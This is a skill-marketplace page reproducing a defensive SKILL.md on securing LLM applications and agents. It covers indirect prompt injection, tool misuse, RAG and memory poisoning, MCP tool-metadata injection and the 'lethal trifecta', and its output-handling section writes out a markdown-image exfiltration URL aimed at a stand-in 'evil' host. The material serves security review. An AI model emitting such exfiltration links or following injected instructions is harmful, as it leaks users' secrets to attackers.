Agent skill

Securing AI Systems

by trilwu in trilwu/secskills

Assess and harden LLM applications and agentic systems against prompt injection, tool misuse, excessive agency, memory poisoning, RAG data leakage, and model supply-chain risk, mapped to the OWASP…

MITAuto-check passedSecurity

Install Securing AI Systems

skills CLI
$ npx skills add trilwu/secskills --skill securing-ai-systems -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install trilwu/secskills securing-ai-systems --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/trilwu/secskills.git skills-src && mkdir -p .claude/skills && cp -r skills-src/secskills-core/skills/securing-ai-systems .claude/skills/securing-ai-systems && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
securing-ai-systems
GitHub stars
157
Token cost
~2.9k tokens
SKILL.md length
1,404 words
Files
2 (incl. references)
Skills in repo
50
Repo updated
First seen
Licence
MIT

At a glance

Assess and harden LLM applications and agentic systems against prompt injection, tool misuse, excessive agency, memory poisoning, RAG data leakage, and model supply-chain risk, mapped to the OWASP…

  • Works in 3 steps: Access to private data (files, DB,… → Exposure to untrusted content (web… → A way to communicate externally (HTTP,…
  • Reviewing an AI feature
  • SKILL.md covers When to Use, When NOT to Use, Route to a Depth Skill and The Core Rule, plus 7 more sections
  • Calls python3 and curl; reaches defuddle.md

What it does

Securing AI Systems is an agent skill from trilwu/secskills. Assess and harden LLM applications and agentic systems against prompt injection, tool misuse, excessive agency, memory poisoning, RAG data leakage, and model supply-chain risk, mapped to the OWASP Top 10 for LLM and Agentic Applications. Use when reviewing an AI feature, agent, MCP server, or RAG pipeline for security, or when threat modeling an autonomous system.

Its SKILL.md is about 2.9k tokens, which your agent loads only when the skill is triggered. The skill folder holds 2 other files, including reference files (for example `references/ai-test-cases.md`).

It sits in Security, covering Supply chain security, Prompt injection and agent security and Threat modeling. It works with Model Context Protocol. The repository describes itself as: Transform Claude Code into your personal security engineer. The licence is MIT.

When your agent uses it

  • Reviewing an AI feature
  • RAG pipeline for security
  • Threat modeling an autonomous system

Example prompts

  • “/securing-ai-systems”

Requirements

  • Python 3

Workflow steps

3 steps, taken from the first numbered list in SKILL.md.

  1. Access to private data (files, DB, internal APIs, user context)
  2. Exposure to untrusted content (web pages, email, tickets, PRs, docs)
  3. A way to communicate externally (HTTP, email, writes to a shared surface)

What it can do on your machine

Read from SKILL.md and the folder at commit ca53957. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    Shell commands in SKILL.md call:

    • python3
    • curl

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    Hosts in commands or code, which the agent is likely to contact:

    • defuddle.md

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Securing AI Systems loads about 2.9k tokens when it runs, and up to ~4.5k if it reads all its reference files. Until then it costs about 97 tokens; SKILL.md has 1,404 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~97
When it runs · the whole SKILL.md, loaded when a task matches
~2.9k
With references · SKILL.md plus every file in references/, read only if the agent opens them
~4.5k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check passed

The automated check found no risky patterns in SKILL.md.

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.

SKILL.md

The full file from trilwu/secskills at commit ca53957, republished under its MIT licence (© trilwu). 1,404 words, ~2,921 tokens.

Download SKILL.mdSave it as .claude/skills/securing-ai-systems/SKILL.md (or your agent's skills folder). This skill also uses 1 other file; get the full folder from GitHub.
name
securing-ai-systems
description
Assess and harden LLM applications and agentic systems against prompt injection, tool misuse, excessive agency, memory poisoning, RAG data leakage, and model supply-chain risk, mapped to the OWASP Top 10 for LLM and Agentic Applications. Use when reviewing an AI feature, agent, MCP server, or RAG pipeline for security, or when threat modeling an autonomous system.
verified
2026-07-27

Securing AI Systems

LLM applications break the assumption every other security control is built on: that instructions and data are separable. In an LLM, data is instructions. Every design that reads untrusted content and then acts has to be evaluated with that in mind, and no amount of prompt engineering fixes it.

When to Use

  • Security review of an LLM-backed feature, chatbot, or copilot
  • Threat modeling an agentic system: tools, autonomy, memory, multi-agent
  • Reviewing an MCP server, tool definition, or plugin surface
  • Assessing a RAG pipeline for data leakage and poisoning
  • Evaluating model, dataset, and dependency supply chain
  • Red teaming an AI system with authorization

When NOT to Use

  • Conventional web/API vulnerabilities in the surrounding app — use auditing-code-for-vulnerabilities, testing-web-applications, testing-apis. Most real AI-app breaches are still ordinary IDOR and SSRF.
  • Building jailbreaks or attacks against third-party models you do not own or have authorization to test — out of scope
  • Model safety alignment research — different discipline

Route to a Depth Skill

FocusSkill
Auditing an MCP server specifically — tool-definition injection, per-tool authorization, transport security, resource exposureauditing-mcp-servers

The MCP review here is one part of a wider AI threat model; reach for auditing-mcp-servers when the server implementation itself is the target.

The Core Rule

Treat every model output as untrusted user input, and every input the model reads as potentially adversarial instructions.

From that single rule, most of the correct architecture follows: never route model output into a sink without the same validation you would apply to a form field, and never grant the model an authority the least trusted content it will read should not have.

The Lethal Trifecta

An agent is exposed to serious compromise when it has all three of:

  1. Access to private data (files, DB, internal APIs, user context)
  2. Exposure to untrusted content (web pages, email, tickets, PRs, docs)
  3. A way to communicate externally (HTTP, email, writes to a shared surface)

Any two are usually manageable. All three means untrusted content can direct the agent to read secrets and send them out. When reviewing an agentic system, find whether the trifecta closes — and if it does, that is the finding, before any specific payload.

Breaking any one leg is a valid mitigation: scope the data, sanitize/isolate the content, or gate egress behind human approval.

Threat Areas

Prompt injection — direct and indirect

Indirect injection is the one that matters. Instructions embedded in a web page, PDF, email, repository file, calendar invite, or database row that the model retrieves and follows.

Review questions:

  • Enumerate every content source the model can read. Which are attacker writable? (Public web, user uploads, third-party APIs, other users' data, ticket systems, and PR contents all qualify.)
  • Is retrieved content structurally separated from instructions, or concatenated into the same prompt?
  • What is the worst action reachable from a successful injection? That is the real severity, not the injection itself.
Test payloads live in `references/ai-test-cases.md`. The important test is not
whether a payload works — it is what the payload can reach when it does.

Mitigations that work: capability restriction (the agent cannot do the harmful thing at all), human approval on consequential actions, egress allowlisting, separate untrusted content into a sub-agent with no tools and no secrets, dual-model patterns where a privileged planner never sees raw untrusted text.

Mitigations that do not work alone: "ignore instructions in the document" system prompts, input filtering for injection strings, output classifiers. These raise cost; they do not close the hole. Never accept a design whose only control is a prompt instruction.

Excessive agency and tool misuse
  • Does each tool enforce authorization server-side, using the end user's identity, or does it run with the agent's ambient credentials?
  • Is the tool scope minimal? A run_sql(query) tool is a SQL injection primitive by design; get_orders(user_id) is not.
  • Are destructive and irreversible actions gated by confirmation, and is the confirmation itself resistant to injection (shown to a human with the real parameters, not summarized by the model)?
  • Is there a rate/spend limit, and a loop breaker for recursive agent calls?

The confused deputy pattern is the dominant real-world AI vulnerability: the agent holds broad credentials and acts on behalf of a low-privilege user who can influence its instructions. Check the identity used at the tool boundary, not at the chat boundary.

RAG and memory
  • Can a user's query retrieve chunks from documents they cannot access? Test it. Tenant filters must be applied in the vector query, not in a post-retrieval filter the model can be persuaded to skip.
  • Is the ingestion pipeline attacker-reachable? A poisoned document in the index is persistent indirect injection.
  • Does persistent memory store attacker-controlled text that will be replayed in future sessions, possibly for other users? Memory poisoning is durable and frequently unmonitored.
  • Are embeddings treated as non-sensitive? They are invertible enough to leak.
Output handling

Model output reaching a sink is ordinary vulnerability territory with an unusual source:

SinkRisk
innerHTML / markdown rendererXSS; also image tags used for exfil via URL parameters
SQL / shell / evalInjection with a fully attacker-influenceable string
File pathTraversal
HTTP request URLSSRF and data exfiltration channel
Downstream agent's promptInjection propagation across agents

Markdown image rendering deserves specific attention: ![](https://evil/?d=<secrets>) in model output is a zero-click exfiltration channel in most chat UIs. Check the renderer's allowed domains.

Show full SKILL.md (549 more words)Show less
Model and data supply chain
bash
# Never load pickle-based weights from an untrusted source
# .bin / .pt / .ckpt → arbitrary code execution on load. Prefer safetensors.
python3 -c "import safetensors; print('use this format')"
picklescan -p model.pt          # scan before any load
modelscan -p ./models/

# Verify provenance
# - model card, license, and origin org
# - hash pinning in the loader, not "latest"
# - dataset provenance for fine-tunes; poisoned training data is unrecoverable

Also review: unpinned model versions in production, third-party inference providers and what they retain, and fine-tuning datasets containing customer data (an extraction risk and often a compliance one).

MCP servers and tool definitions
  • Tool descriptions are part of the prompt. A malicious or compromised MCP server can inject instructions through its tool metadata, including into conversations about other tools.
  • Is the server pinned to a version and a known publisher? Does it change its tool definitions at runtime (rug-pull)?
  • What credentials does the server hold, and what is the blast radius if the model is persuaded to call every tool it exposes with attacker-chosen arguments?
  • Cross-server leakage: one server's tool results can influence calls to another server's tools.

Review Workflow

1. Map:      inputs → model → tools/sinks. Draw it. Mark every trust boundary.
2. Classify: for each input, is it attacker-writable? For each tool, what is
             the worst-case invocation?
3. Trifecta: does private data + untrusted content + egress close?
4. Identity: at each tool call, whose authority is used, and is it checked
             server-side?
5. Test:     indirect injection through the real ingestion path, not the chat box
6. Blast:    for each successful injection, enumerate reachable impact
7. Fix:      prefer architectural constraints over prompt-level defenses

Test through the real path. An injection that works when pasted into chat but cannot reach the retrieval pipeline is a demo; one delivered through an indexed document is a vulnerability.

Rationalizations to Reject

  • "The system prompt tells it to ignore injected instructions." Not a control. Prompt-level defenses are probabilistic and bypassed routinely.
  • "We filter for injection patterns." Encoding, translation, and paraphrasing defeat pattern filters. Useful as depth, never as the control.
  • "The model is well-aligned and won't do that." Alignment is not an authorization boundary.
  • "It's read-only, so injection doesn't matter." Read plus any egress is exfiltration. And "read-only" tools often reach further than assumed.
  • "Only internal staff use it." Internal agents read external content — tickets, emails, PRs, vendor docs — which is exactly the injection vector.
  • "We'll add a human in the loop." Only if the human sees the actual action and parameters. Approving a model-written summary of the action approves nothing.
  • "A guardrail model checks the output." It is another model reading attacker-influenced text.

Deliverable

  • Architecture diagram with trust boundaries and the trifecta assessment
  • Per-tool table: authority used, authorization enforcement point, worst-case invocation, gating
  • Injection test results delivered through real ingestion paths, with reached impact for each
  • Data-flow findings: tenant isolation in retrieval, memory persistence, egress
  • Supply-chain findings: model format, pinning, provenance, MCP servers
  • Recommendations ordered by architectural strength, not by ease

Reading External Sources

Fetch public advisories, specifications, and vendor reports as Markdown:

bash
curl -sL "https://defuddle.md/<url>"      # scheme in the path is optional

This strips page boilerplate — roughly 78% fewer tokens on a prose page — and returns the full text rather than a summary, so you can grep it and trust a negative result.

Three things it is not for. Fetch JSON and API responses raw, because readability extraction mangles structured data. Fetch authenticated or JavaScript-rendered pages directly, because it retrieves them anonymously. And never route adversary infrastructure (phishing links, C2, malware hosting), client-owned hosts, or engagement URLs through it — the request leaves your machine to a third party, and for live adversary infrastructure it also tips off the operator.

Some sites block the extractor and return an error blob rather than the page — {"error":"Failed to fetch: 418 I'm a teapot"} from freedesktop.org, for instance. That is the fetch being refused, not the source saying the thing does not exist. Re-fetch the URL directly before drawing any conclusion from it.

References

  • references/ai-test-cases.md — injection test corpus and tool-abuse cases
  • auditing-code-for-vulnerabilities — the conventional bugs in the same app
  • OWASP Top 10 for LLM Applications; OWASP Top 10 for Agentic Applications (2026)
  • MITRE ATLAS for adversarial ML techniques
  • NIST AI RMF for governance framing

© trilwu, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

SKILL.md and 1 other file (references) in secskills-core/skills/securing-ai-systems of trilwu/secskills.

  • SKILL.md
  • references/ai-test-cases.md

Open the folder on GitHubat commit ca53957

Compare with similar skills

Securing AI Systems next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Securing AI Systems compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Securing AI Systems this skilltrilwu/secskills157—~2.9kAutomated safety check: PassMIT
Securitytelagod/code-abyss243—~907Automated safety check: PassMIT
Forensifyalexgreensh/repo-forensics188—~2.5kAutomated safety check: NotesCustom licence
Plugin Scanneriflytek/skillhub5.2k2 repos~1.1kAutomated safety check: NotesApache-2.0
MCP Server Security Auditawarexone/Agentic-Bug-Hunter5.3k—~1.9kAutomated safety check: WarnMIT
Auditing MCP Servers For Tool Poisoningmukul975/Anthropic-Cybersecurity-Skills34k—~2.7kAutomated safety check: WarnApache-2.0

Similar skills

  • Security

    telagod/code-abyss

    Defensive security engineering judgment, distilled from a stronger model - invoke when THREAT MODELING a system or feature; making security-relevant design decisions (auth, crypto, trust boundaries…

    243 GitHub stars~907 tokensUpdated 2 mo ago
    SecurityAuto-check passed
  • Forensify

    alexgreensh/repo-forensics

    Cross-agent self-inspection of your AI-agent stack. An agent skill from alexgreensh/repo-forensics.

    188 GitHub stars~2.5k tokensUpdated 12 days ago
    SecurityAuto-check: notes
  • Plugin Scanner

    iflytek/skillhub

    Scan AI agent skills, plugins, MCP servers, and agent tooling for prompt injection, unsafe commands, secret exposure, and supply-chain risks before installing or trusting them.

    5.2k GitHub starsUsed in 2 repos~1.1k tokens
    SecurityAuto-check: notes
  • MCP Server Security Audit

    awarexone/Agentic-Bug-Hunter

    Audits MCP servers and their client configs for tool poisoning, prompt injection, over-privileged tools, injection bugs, secret leaks and missing approval gates.

    5.3k GitHub stars~1.9k tokensUpdated yesterday
    SecurityAuto-check: warnings
  • Auditing MCP Servers For Tool Poisoning

    mukul975/Anthropic-Cybersecurity-Skills

    Audit MCP servers for tool poisoning, tool shadowing, rug pulls, SSRF, and unauthenticated exposure using Invariant Labs' mcp-scan for static/runtime scanning plus manual SSRF/auth checks and…

    34k GitHub stars~2.7k tokensUpdated 1 mo ago
    SecurityAuto-check: warnings
  • Cso

    no-session/pstack

    Chief Security Officer mode. An agent skill from no-session/pstack.

    135 GitHub stars~12k tokensUpdated 6 mo ago
    SecurityAuto-check: notes

More from trilwu/secskills

All 50 skills in this repo
  • Audit source code for exploitable vulnerabilities using threat-model-driven review, taint tracing, invariant checking, and variant analysis.

    157 GitHub stars~3.2k tokensUpdated 1 mo ago
    Auto-check passed
  • Perform OSINT, subdomain enumeration, port scanning, web reconnaissance, email harvesting, and cloud asset discovery for initial access.

    157 GitHub stars~3.1k tokensUpdated 1 mo ago
    Auto-check: notes
  • Analyzing Binaries

    trilwu/secskills

    Reverse engineer compiled binaries, firmware, and mobile app packages using triage, static disassembly, decompilation, and dynamic instrumentation.

    157 GitHub stars~2.9k tokensUpdated 1 mo ago
    Auto-check passed
  • Analyzing Go Binaries

    trilwu/secskills

    Reverse engineer Go binaries by recovering function names and types from pclntab and moduledata using GoReSym, redress, and IDA/Ghidra Go plugins, and by reading Go's non-standard calling…

    157 GitHub stars~2k tokensUpdated 1 mo ago
    Auto-check passed
  • Analyzing iOS Binaries

    trilwu/secskills

    Analyze iOS applications at the binary level — decrypting FairPlay-protected IPAs with frida-ios-dump or bagbak, inspecting Mach-O load commands, recovering Objective-C headers with class-dump, and…

    157 GitHub stars~2k tokensUpdated 1 mo ago
    Auto-check passed
  • Analyzing Malware

    trilwu/secskills

    Analyze suspected malware safely — containment, static triage, sandboxed detonation, unpacking, capability and C2 extraction, IOC production, and YARA rule authoring.

    157 GitHub stars~3.6k tokensUpdated 1 mo ago
    Auto-check passed

Categories

Questions about Securing AI Systems

What does Securing AI Systems do?

Assess and harden LLM applications and agentic systems against prompt injection, tool misuse, excessive agency, memory poisoning, RAG data leakage, and model supply-chain risk, mapped to the OWASP…. Securing AI Systems is an agent skill from trilwu/secskills. Assess and harden LLM applications and agentic systems against prompt injection, tool misuse, excessive agency, memory poisoning, RAG data leakage, and model supply-chain risk, mapped to the OWASP Top 10 for LLM and Agentic Applications.

When should I use Securing AI Systems?

Securing AI Systems fits situations like: reviewing an AI feature; RAG pipeline for security; threat modeling an autonomous system.

How do I install Securing AI Systems in Claude Code?

Run `npx skills add trilwu/secskills --skill securing-ai-systems -a claude-code`. Or copy the skill folder (secskills-core/skills/securing-ai-systems in trilwu/secskills) into .claude/skills/securing-ai-systems in your project. Claude Code loads it when a task matches its description.

How do I install Securing AI Systems in Codex?

Run `npx skills add trilwu/secskills --skill securing-ai-systems -a codex`. Or copy the skill folder (secskills-core/skills/securing-ai-systems in trilwu/secskills) into .agents/skills/securing-ai-systems in your project. Codex loads it when a task matches its description.

Can I use Securing AI Systems in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add trilwu/secskills --skill securing-ai-systems -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/securing-ai-systems, .gemini/skills/securing-ai-systems, .github/skills/securing-ai-systems and .opencode/skills/securing-ai-systems in your project.

What does Securing AI Systems need to run?

Going by SKILL.md and its folder, Securing AI Systems needs the command-line tools its instructions call (python3 and curl). Our summary lists: Python 3.

Does Securing AI Systems access the network?

SKILL.md names 1 domain. In commands or code: defuddle.md; the agent is likely to contact it when it follows the instructions. This is read from the text; nothing was executed.

Is Securing AI Systems safe to install?

Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.

What licence does Securing AI Systems use?

Securing AI Systems is published under the MIT licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Securing AI Systems use?

About 2.9k tokens (SKILL.md is roughly 12k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full. Its references folder adds about 1.6k tokens, read only when the agent opens those files.

What are the alternatives to Securing AI Systems?

Skills that share tags, products or a category with Securing AI Systems: Security (telagod/code-abyss, 243 stars), Forensify (alexgreensh/repo-forensics, 188 stars), Plugin Scanner (iflytek/skillhub, 5.2k stars) and MCP Server Security Audit (awarexone/Agentic-Bug-Hunter, 5.3k stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Securing AI Systems?

trilwu (a GitHub user) maintains it in trilwu/secskills, which has 157 GitHub stars. The repository holds 50 skills in this directory. The repository was last updated on September 4, 2026.

Source: trilwu/secskills on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.